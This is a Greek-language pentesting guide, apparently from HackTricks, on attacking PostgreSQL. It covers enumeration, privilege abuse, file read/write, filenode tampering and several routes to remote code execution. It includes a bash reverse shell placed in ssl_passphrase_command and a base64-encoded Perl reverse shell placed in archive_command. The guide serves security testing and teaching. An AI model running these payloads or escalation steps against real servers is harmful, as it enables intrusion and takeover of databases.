5432,5433 - Pentesting Postgresql
Χρησιμοποιήστε Trickest για να δημιουργήσετε εύκολα και να αυτοματοποιήσετε ροές εργασίας που υποστηρίζονται από τα πιο προηγμένα εργαλεία της κοινότητας. Αποκτήστε πρόσβαση σήμερα:
Βασικές Πληροφορίες
PostgreSQL περιγράφεται ως ένα σύστημα αντικειμενο-σχεσιακής βάσης δεδομένων που είναι ανοιχτού κώδικα. Αυτό το σύστημα δεν χρησιμοποιεί μόνο τη γλώσσα SQL αλλά την ενισχύει επίσης με επιπλέον δυνατότητες. Οι ικανότητές του του επιτρέπουν να χειρίζεται ένα ευρύ φάσμα τύπων δεδομένων και λειτουργιών, καθιστώντας το μια ευέλικτη επιλογή για προγραμματιστές και οργανισμούς.
Προεπιλεγμένη θύρα: 5432, και αν αυτή η θύρα είναι ήδη σε χρήση φαίνεται ότι το postgresql θα χρησιμοποιήσει την επόμενη θύρα (πιθανώς 5433) που δεν είναι σε χρήση.
Σύνδεση & Βασική Καταμέτρηση
Αν τρέχοντας \list
βρείτε μια βάση δεδομένων που ονομάζεται rdsadmin
ξέρετε ότι βρίσκεστε μέσα σε μια AWS postgresql database.
Για περισσότερες πληροφορίες σχετικά με το πώς να εκμεταλλευτείτε μια βάση δεδομένων PostgreSQL ελέγξτε:
PostgreSQL injectionΑυτόματη Αρίθμηση
Σάρωση θύρας
Σύμφωνα με αυτή την έρευνα, όταν μια προσπάθεια σύνδεσης αποτύχει, το dblink
ρίχνει μια εξαίρεση sqlclient_unable_to_establish_sqlconnection
που περιλαμβάνει μια εξήγηση του σφάλματος. Παραδείγματα αυτών των λεπτομερειών παρατίθενται παρακάτω.
Ο διακομιστής είναι εκτός λειτουργίας
DETAIL: δεν ήταν δυνατή η σύνδεση με τον διακομιστή: Δεν υπάρχει διαδρομή προς τον διακομιστή Εκτελείται ο διακομιστής στον υπολογιστή "1.2.3.4" και δέχεται συνδέσεις TCP/IP στην θύρα 5678;
Η θύρα είναι κλειστή
Η θύρα είναι ανοιχτή
ή
Η θύρα είναι ανοιχτή ή φιλτραρισμένη
In PL/pgSQL functions, δεν είναι δυνατόν να αποκτηθούν λεπτομέρειες εξαιρέσεων. Ωστόσο, αν έχετε άμεση πρόσβαση στον PostgreSQL server, μπορείτε να ανακτήσετε τις απαραίτητες πληροφορίες. Αν η εξαγωγή ονομάτων χρηστών και κωδικών πρόσβασης από τους πίνακες συστήματος δεν είναι εφικτή, μπορείτε να εξετάσετε τη μέθοδο επίθεσης wordlist που συζητήθηκε στην προηγούμενη ενότητα, καθώς θα μπορούσε να αποφέρει θετικά αποτελέσματα.
Enumeration of Privileges
Roles
Role Types | |
---|---|
rolsuper | Ο ρόλος έχει προνόμια superuser |
rolinherit | Ο ρόλος κληρονομεί αυτόματα τα προνόμια των ρόλων των οποίων είναι μέλος |
rolcreaterole | Ο ρόλος μπορεί να δημιουργήσει περισσότερους ρόλους |
rolcreatedb | Ο ρόλος μπορεί να δημιουργήσει βάσεις δεδομένων |
rolcanlogin | Ο ρόλος μπορεί να συνδεθεί. Δηλαδή, αυτός ο ρόλος μπορεί να δοθεί ως το αρχικό αναγνωριστικό εξουσιοδότησης της συνεδρίας |
rolreplication | Ο ρόλος είναι ρόλος αναπαραγωγής. Ένας ρόλος αναπαραγωγής μπορεί να ξεκινήσει συνδέσεις αναπαραγωγής και να δημιουργήσει και να διαγράψει θέσεις αναπαραγωγής. |
rolconnlimit | Για ρόλους που μπορούν να συνδεθούν, αυτό ορίζει τον μέγιστο αριθμό ταυτόχρονων συνδέσεων που μπορεί να κάνει αυτός ο ρόλος. -1 σημαίνει χωρίς όριο. |
rolpassword | Όχι ο κωδικός πρόσβασης (διαβάζεται πάντα ως |
rolvaliduntil | Χρόνος λήξης κωδικού πρόσβασης (χρησιμοποιείται μόνο για την αυθεντικοποίηση κωδικού πρόσβασης); null αν δεν υπάρχει λήξη |
rolbypassrls | Ο ρόλος παρακάμπτει κάθε πολιτική ασφαλείας σε επίπεδο γραμμής, δείτε Section 5.8 για περισσότερες πληροφορίες. |
rolconfig | Προεπιλεγμένες ρυθμίσεις συγκεκριμένες για τον ρόλο για μεταβλητές ρύθμισης χρόνου εκτέλεσης |
oid | ID του ρόλου |
Interesting Groups
Αν είστε μέλος του
pg_execute_server_program
μπορείτε να εκτελείτε προγράμματαΑν είστε μέλος του
pg_read_server_files
μπορείτε να διαβάζετε αρχείαΑν είστε μέλος του
pg_write_server_files
μπορείτε να γράφετε αρχεία
Σημειώστε ότι στο Postgres, ένας χρήστης, μια ομάδα και ένας ρόλος είναι το ίδιο. Εξαρτάται απλώς από το πώς το χρησιμοποιείτε και αν επιτρέπετε να συνδεθεί.
Πίνακες
Συναρτήσεις
File-system actions
Read directories and files
Από αυτήν την δέσμευση τα μέλη της καθορισμένης ομάδας DEFAULT_ROLE_READ_SERVER_FILES
(που ονομάζεται pg_read_server_files
) και οι super users μπορούν να χρησιμοποιούν τη μέθοδο COPY
σε οποιαδήποτε διαδρομή (ελέγξτε το convert_and_check_filename
στο genfile.c
):
Να θυμάστε ότι αν δεν είστε υπερχρήστης αλλά έχετε τα δικαιώματα CREATEROLE μπορείτε να γίνετε μέλος αυτής της ομάδας:
Υπάρχουν άλλες συναρτήσεις postgres που μπορούν να χρησιμοποιηθούν για να διαβάσουν ένα αρχείο ή να καταγράψουν έναν κατάλογο. Μόνο superusers και χρήστες με ρητές άδειες μπορούν να τις χρησιμοποιήσουν:
Μπορείτε να βρείτε περισσότερες συναρτήσεις στο https://www.postgresql.org/docs/current/functions-admin.html
Απλή Γραφή Αρχείου
Μόνο οι super users και τα μέλη του pg_write_server_files
μπορούν να χρησιμοποιήσουν το copy για να γράψουν αρχεία.
Θυμηθείτε ότι αν δεν είστε υπερχρήστης αλλά έχετε τα δικαιώματα CREATEROLE
μπορείτε να γίνετε μέλος αυτής της ομάδας:
Θυμηθείτε ότι το COPY δεν μπορεί να χειριστεί χαρακτήρες νέας γραμμής, επομένως ακόμη και αν χρησιμοποιείτε ένα payload base64 πρέπει να στείλετε μια ενιαία γραμμή.
Ένας πολύ σημαντικός περιορισμός αυτής της τεχνικής είναι ότι copy
δεν μπορεί να χρησιμοποιηθεί για να γράψει δυαδικά αρχεία καθώς τροποποιεί κάποιες δυαδικές τιμές.
Ανέβασμα δυαδικών αρχείων
Ωστόσο, υπάρχουν άλλες τεχνικές για να ανεβάσετε μεγάλα δυαδικά αρχεία:
Big Binary Files Upload (PostgreSQL)Συμβουλή bug bounty: εγγραφείτε στο Intigriti, μια premium πλατφόρμα bug bounty που δημιουργήθηκε από hackers, για hackers! Ελάτε μαζί μας στο https://go.intigriti.com/hacktricks σήμερα, και αρχίστε να κερδίζετε βραβεία έως $100,000!
Ενημέρωση δεδομένων πίνακα PostgreSQL μέσω εγγραφής τοπικού αρχείου
Εάν έχετε τις απαραίτητες άδειες για να διαβάσετε και να γράψετε αρχεία του διακομιστή PostgreSQL, μπορείτε να ενημερώσετε οποιονδήποτε πίνακα στον διακομιστή επικαλύπτοντας τον σχετικό κόμβο αρχείου στον κατάλογο δεδομένων PostgreSQL. Περισσότερα για αυτήν την τεχνική εδώ.
Απαιτούμενα βήματα:
Αποκτήστε τον κατάλογο δεδομένων PostgreSQL
Σημείωση: Εάν δεν μπορείτε να ανακτήσετε την τρέχουσα διαδρομή του καταλόγου δεδομένων από τις ρυθμίσεις, μπορείτε να ερωτήσετε την κύρια έκδοση PostgreSQL μέσω του ερωτήματος SELECT version()
και να προσπαθήσετε να βρείτε τη διαδρομή με brute-force. Κοινές διαδρομές καταλόγου δεδομένων σε εγκαταστάσεις Unix του PostgreSQL είναι /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Ένα κοινό όνομα κλάσματος είναι main
. 2. Αποκτήστε μια σχετική διαδρομή προς τον κόμβο αρχείου, που σχετίζεται με τον στόχο πίνακα
Αυτή η ερώτηση θα πρέπει να επιστρέψει κάτι σαν base/3/1337
. Η πλήρης διαδρομή στον δίσκο θα είναι $DATA_DIRECTORY/base/3/1337
, δηλαδή /var/lib/postgresql/13/main/base/3/1337
. 3. Κατεβάστε τον κόμβο αρχείου μέσω των συναρτήσεων lo_*
Αποκτήστε τον τύπο δεδομένων, που σχετίζεται με τον στόχο πίνακα
Χρησιμοποιήστε τον Επεξεργαστή Κόμβου Αρχείου PostgreSQL για να επεξεργαστείτε τον κόμβο αρχείου; ορίστε όλες τις boolean σημαίες
rol*
σε 1 για πλήρεις άδειες.
6. Επαναφορτώστε τον επεξεργασμένο κόμβο αρχείου μέσω των συναρτήσεων lo_*
, και επικαλύψτε το αρχικό αρχείο στον δίσκο
(Προαιρετικά) Καθαρίστε την κρυφή μνήμη του πίνακα που βρίσκεται στη μνήμη εκτελώντας ένα ακριβό SQL ερώτημα
Τώρα θα πρέπει να δείτε ενημερωμένες τιμές πίνακα στο PostgreSQL.
Μπορείτε επίσης να γίνετε superadmin επεξεργάζοντας τον πίνακα pg_authid
. Δείτε την επόμενη ενότητα.
RCE
RCE σε πρόγραμμα
Από την έκδοση 9.3, μόνο οι super users και τα μέλη της ομάδας pg_execute_server_program
μπορούν να χρησιμοποιήσουν το copy για RCE (παράδειγμα με εξαγωγή:
Παράδειγμα για exec:
Θυμηθείτε ότι αν δεν είστε υπερ-χρήστης αλλά έχετε τα δικαιώματα CREATEROLE
μπορείτε να γίνετε μέλος αυτής της ομάδας:
Ή χρησιμοποιήστε το multi/postgres/postgres_copy_from_program_cmd_exec
module από το metasploit.
Περισσότερες πληροφορίες σχετικά με αυτή την ευπάθεια εδώ. Ενώ αναφέρθηκε ως CVE-2019-9193, το Postges δήλωσε ότι αυτό ήταν χαρακτηριστικό και δεν θα διορθωθεί.
RCE με γλώσσες PostgreSQL
RCE with PostgreSQL LanguagesRCE με επεκτάσεις PostgreSQL
Αφού έχετε μάθει από την προηγούμενη ανάρτηση πώς να ανεβάσετε δυαδικά αρχεία, μπορείτε να προσπαθήσετε να αποκτήσετε RCE ανεβάζοντας μια επέκταση postgresql και φορτώνοντάς την.
RCE with PostgreSQL ExtensionsRCE με το αρχείο ρυθμίσεων PostgreSQL
Οι παρακάτω RCE διανύσματα είναι ιδιαίτερα χρήσιμα σε περιορισμένα SQLi συμφραζόμενα, καθώς όλα τα βήματα μπορούν να εκτελούνται μέσω εσωτερικών δηλώσεων SELECT
Το αρχείο ρυθμίσεων του PostgreSQL είναι γραμμένο από τον χρήστη postgres, ο οποίος είναι αυτός που εκτελεί τη βάση δεδομένων, οπότε ως superuser, μπορείτε να γράψετε αρχεία στο σύστημα αρχείων, και επομένως μπορείτε να επικαλύψετε αυτό το αρχείο.
RCE με ssl_passphrase_command
Περισσότερες πληροφορίες για αυτή την τεχνική εδώ.
Το αρχείο ρυθμίσεων έχει μερικά ενδιαφέροντα χαρακτηριστικά που μπορούν να οδηγήσουν σε RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Διαδρομή προς το ιδιωτικό κλειδί της βάσης δεδομένωνssl_passphrase_command = ''
Εάν το ιδιωτικό αρχείο προστατεύεται από κωδικό (κρυπτογραφημένο), το postgresql θα εκτελέσει την εντολή που υποδεικνύεται σε αυτό το χαρακτηριστικό.ssl_passphrase_command_supports_reload = off
Εάν αυτό το χαρακτηριστικό είναι ενεργό, η εντολή που εκτελείται εάν το κλειδί προστατεύεται από κωδικό θα εκτελείται όταν εκτελείται τοpg_reload_conf()
.
Στη συνέχεια, ένας επιτιθέμενος θα χρειαστεί να:
Εξάγει το ιδιωτικό κλειδί από τον διακομιστή
Κρυπτογραφήσει το κατεβασμένο ιδιωτικό κλειδί:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Επικαλύψει
Εξάγει την τρέχουσα ρύθμιση του postgresql
Επικαλύψει τη ρύθμιση με τη ρύθμιση των αναφερόμενων χαρακτηριστικών:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Εκτελέστε
pg_reload_conf()
Κατά τη διάρκεια της δοκιμής αυτού, παρατήρησα ότι αυτό θα λειτουργήσει μόνο εάν το ιδιωτικό αρχείο κλειδιού έχει δικαιώματα 640, είναι κατοχυρωμένο από τον root και από την ομάδα ssl-cert ή postgres (έτσι ώστε ο χρήστης postgres να μπορεί να το διαβάσει), και είναι τοποθετημένο στο /var/lib/postgresql/12/main.
RCE με archive_command
Περισσότερες πληροφορίες σχετικά με αυτή τη ρύθμιση και για το WAL εδώ.
Ένα άλλο χαρακτηριστικό στο αρχείο ρυθμίσεων που είναι εκμεταλλεύσιμο είναι το archive_command
.
Για να λειτουργήσει αυτό, η ρύθμιση archive_mode
πρέπει να είναι 'on'
ή 'always'
. Εάν αυτό είναι αληθές, τότε θα μπορούσαμε να επικαλύψουμε την εντολή στο archive_command
και να την αναγκάσουμε να εκτελείται μέσω των λειτουργιών WAL (write-ahead logging).
Τα γενικά βήματα είναι:
Ελέγξτε εάν η λειτουργία αρχείου είναι ενεργοποιημένη:
SELECT current_setting('archive_mode')
Επικαλύψτε το
archive_command
με το payload. Για παράδειγμα, μια αντίστροφη θήκη:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Επαναφορτώστε τη ρύθμιση:
SELECT pg_reload_conf()
Αναγκάστε τη λειτουργία WAL να εκτελείται, η οποία θα καλέσει την εντολή αρχείου:
SELECT pg_switch_wal()
ήSELECT pg_switch_xlog()
για ορισμένες εκδόσεις Postgres
RCE με βιβλιοθήκες προφόρτωσης
Περισσότερες πληροφορίες για αυτή την τεχνική εδώ.
Αυτός ο επιθετικός διανύσματος εκμεταλλεύεται τις παρακάτω ρυθμιστικές μεταβλητές:
session_preload_libraries
-- βιβλιοθήκες που θα φορτωθούν από τον διακομιστή PostgreSQL κατά τη σύνδεση του πελάτη.dynamic_library_path
-- λίστα καταλόγων όπου ο διακομιστής PostgreSQL θα αναζητήσει τις βιβλιοθήκες.
Μπορούμε να ορίσουμε την τιμή dynamic_library_path
σε έναν κατάλογο, που είναι εγγράψιμος από τον χρήστη postgres
που εκτελεί τη βάση δεδομένων, π.χ., κατάλογο /tmp/
, και να ανεβάσουμε ένα κακόβουλο αντικείμενο .so
εκεί. Στη συνέχεια, θα αναγκάσουμε τον διακομιστή PostgreSQL να φορτώσει τη νέα μας βιβλιοθήκη περιλαμβάνοντάς την στη μεταβλητή session_preload_libraries
.
Τα βήματα της επίθεσης είναι:
Κατεβάστε το αρχικό
postgresql.conf
Συμπεριλάβετε τον κατάλογο
/tmp/
στην τιμήdynamic_library_path
, π.χ.dynamic_library_path = '/tmp:$libdir'
Συμπεριλάβετε το όνομα της κακόβουλης βιβλιοθήκης στην τιμή
session_preload_libraries
, π.χ.session_preload_libraries = 'payload.so'
Ελέγξτε την κύρια έκδοση PostgreSQL μέσω του ερωτήματος
SELECT version()
Συγκεντρώστε τον κωδικό της κακόβουλης βιβλιοθήκης με το σωστό πακέτο ανάπτυξης PostgreSQL Δείγμα κώδικα:
Συγκέντρωση του κώδικα:
Ανεβάστε το κακόβουλο
postgresql.conf
, που δημιουργήθηκε στα βήματα 2-3, και επικαλύψτε το αρχικόΑνεβάστε το
payload.so
από το βήμα 5 στον κατάλογο/tmp
Επαναφορτώστε τη ρύθμιση του διακομιστή επανεκκινώντας τον διακομιστή ή καλώντας το ερώτημα
SELECT pg_reload_conf()
Στη επόμενη σύνδεση DB, θα λάβετε τη σύνδεση αντίστροφης θήκης.
Postgres Privesc
CREATEROLE Privesc
Grant
Σύμφωνα με τα έγγραφα: Οι ρόλοι που έχουν CREATEROLE
δικαίωμα μπορούν να παραχωρήσουν ή να ανακαλέσουν την ιδιότητα μέλους σε οποιονδήποτε ρόλο που δεν είναι superuser.
Έτσι, αν έχετε CREATEROLE
άδεια, μπορείτε να παραχωρήσετε πρόσβαση σε άλλους ρόλους (που δεν είναι superuser) που μπορούν να σας δώσουν την επιλογή να διαβάσετε & γράψετε αρχεία και να εκτελέσετε εντολές:
Modify Password
Οι χρήστες με αυτόν τον ρόλο μπορούν επίσης να αλλάξουν τους κωδικούς πρόσβασης άλλων μη υπερχρηστών:
Privesc to SUPERUSER
Είναι αρκετά συνηθισμένο να διαπιστώνει κανείς ότι οι τοπικοί χρήστες μπορούν να συνδεθούν στο PostgreSQL χωρίς να παρέχουν κανέναν κωδικό πρόσβασης. Επομένως, μόλις έχετε συγκεντρώσει δικαιώματα για να εκτελέσετε κώδικα μπορείτε να εκμεταλλευτείτε αυτά τα δικαιώματα για να σας παραχωρηθεί ο ρόλος SUPERUSER
:
Αυτό είναι συνήθως δυνατό λόγω των παρακάτω γραμμών στο αρχείο pg_hba.conf
: